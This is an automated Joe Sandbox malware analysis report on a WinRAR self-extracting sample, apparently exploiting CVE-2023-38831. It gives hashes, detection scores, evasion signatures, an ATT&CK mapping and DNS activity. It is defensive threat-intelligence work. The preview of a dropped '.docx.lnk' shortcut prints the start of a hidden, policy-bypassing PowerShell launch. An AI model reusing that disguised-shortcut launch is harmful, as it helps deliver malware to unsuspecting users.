Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSZXPMB7kS.exe

Overview

General Information

Sample name:HSZXPMB7kS.exe
renamed because original name is a hash value
Original sample name:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd.exe
Analysis ID:1522688
MD5:d6f5ca5da79a7eb267670cc0e6f5d590
SHA1:6d62f339e2bb9b107b0309663d30e4e4647e4b5d
SHA256:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
Tags:exeUAC-0099user-JAMESWT_MHT
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious LNK Double Extension File Created
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • HSZXPMB7kS.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\HSZXPMB7kS.exe" MD5: D6F5CA5DA79A7EB267670CC0E6F5D590)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious LNK Double Extension File Created
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\HSZXPMB7kS.exe, ProcessId: 2816, TargetFilename: C:\Users\user\Desktop\???i????-582-4453-08.docx.lnk

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: HSZXPMB7kS.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: HSZXPMB7kS.exeReversingLabs: Detection: 63%
Source: HSZXPMB7kS.exeVirustotal: Detection: 65%Perma Link
Source: HSZXPMB7kS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HSZXPMB7kS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HSZXPMB7kS.exe
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0012BA94
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0013D410
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0014C4F8 FindFirstFileExA,1_2_0014C4F8
Source: unknownDNS traffic detected: query: 183.59.114.20.in-addr.arpa replaycode: Name error (3)
Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: 183.59.114.20.in-addr.arpa
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013B080 SetWindowLongW,NtdllDefWindowProc_W,1_2_0013B080
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00127AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00127AAF
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001292C61_2_001292C6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00137DCC1_2_00137DCC
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001350011_2_00135001
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001382431_2_00138243
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001352721_2_00135272
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001462981_2_00146298
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001302F71_2_001302F7
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001313F61_2_001313F6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013741E1_2_0013741E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001464C71_2_001464C7
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001355A01_2_001355A0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0014E5F01_2_0014E5F0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001307A01_2_001307A0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012D8331_2_0012D833
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013889F1_2_0013889F
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012395A1_2_0012395A
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0014EA9E1_2_0014EA9E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00124A8E1_2_00124A8E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00152BA41_2_00152BA4
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012FCCC1_2_0012FCCC
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00122EB61_2_00122EB6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: String function: 0013FEEC appears 42 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: String function: 0013FFC0 appears 56 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: String function: 00140790 appears 31 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: HSZXPMB7kS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@1/1@2/0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00127727 GetLastError,FormatMessageW,1_2_00127727
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013B0BE CLSIDFromString,CoCreateInstance,1_2_0013B0BE
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013B6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_0013B6C2
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5346625Jump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCommand line argument: sfxname1_2_0013F04C
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCommand line argument: sfxstime1_2_0013F04C
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCommand line argument: STARTDLG1_2_0013F04C
Source: HSZXPMB7kS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: HSZXPMB7kS.exeReversingLabs: Detection: 63%
Source: HSZXPMB7kS.exeVirustotal: Detection: 65%
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeFile read: C:\Users\user\Desktop\HSZXPMB7kS.exeJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HSZXPMB7kS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: HSZXPMB7kS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HSZXPMB7kS.exe
Source: HSZXPMB7kS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HSZXPMB7kS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HSZXPMB7kS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HSZXPMB7kS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HSZXPMB7kS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5346625Jump to behavior
Source: HSZXPMB7kS.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001407E0 push ecx; ret 1_2_001407F3
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013FEEC push eax; ret 1_2_0013FF0A
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeMemory allocated: 5B60000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-24311
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0012BA94
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0013D410
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0014C4F8 FindFirstFileExA,1_2_0014C4F8
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013F81F VirtualQuery,GetSystemInfo,1_2_0013F81F
Source: HSZXPMB7kS.exe, 00000001.00000002.1565305433.0000000003089000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeAPI call chain: ExitProcess graph end nodegraph_1-24520
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001409FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_001409FA
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001491A0 mov eax, dword ptr fs:[00000030h]1_2_001491A0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0014D1E0 GetProcessHeap,1_2_0014D1E0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_001409FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_001409FA
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00140B8D SetUnhandledExceptionFilter,1_2_00140B8D
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00140D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00140D7A
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00144FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00144FDF
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_00140816 cpuid 1_2_00140816
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_0013C083
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0013F04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_0013F04C
Source: C:\Users\user\Desktop\HSZXPMB7kS.exeCode function: 1_2_0012C365 GetVersionExW,1_2_0012C365

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory21
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets34
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
HSZXPMB7kS.exe63%ReversingLabsWin32.Exploit.CVE-2023-38831
HSZXPMB7kS.exe66%VirustotalBrowse
HSZXPMB7kS.exe100%AviraTR/Agent.xxqku

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
15.164.165.52.in-addr.arpa
unknown
unknownfalse
    		unknown
    183.59.114.20.in-addr.arpa
    		unknown
    		unknownfalse
      		unknown

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1522688
      Start date and time:2024-09-30 15:30:14 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 34s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:HSZXPMB7kS.exe
      renamed because original name is a hash value
      Original Sample Name:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd.exe
      Detection:MAL
      Classification:mal56.winEXE@1/1@2/0
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 120
      • Number of non-executed functions: 96
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\Desktop\???i????-582-4453-08.docx.lnk

      Download File
      Process:C:\Users\user\Desktop\HSZXPMB7kS.exe
      File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Fri Aug 4 04:10:09 2023, mtime=Fri Aug 4 04:10:09 2023, atime=Fri Aug 4 04:10:09 2023, length=0, window=hide
      Category:dropped
      Size (bytes):10562
      Entropy (8bit):6.046375755549102
      Encrypted:false
      SSDEEP:192:8iIJudXs1THeATd4shAXDDlL3Gvn2yDctJZ+7BJkY3820pLkz:oJ31rek44AX1L2vDDci3MRpL0
      MD5:4E37F3BBF59B456FB07DC71F3FC20DBA
      SHA1:816ADE8789655D00CC33D290A7D8F8C3321F80C0
      SHA-256:0ACD4A9EF18F3FD1CCF440879E768089D4DD2107E1CE19D2A17A59EBED8C7F5D
      SHA-512:646D1DCF0BA983CD179EB29B2CE4060DBE68E4A8D6B1CBB5F53ADCFCFBF796D6C76139C320D51B2C2B7764AD50498AEA5E911D467B3EB5149D7B7CAE39C718DD
      Malicious:false
      Reputation:low
      Preview:L..................Fe........Ng.....Ng.....Ng.................................P.O. .:i.....+00.../C:\.....................2..:..HG.%..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.%.KMA....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F......'-w hidden -nop -noni -exec bypass -c 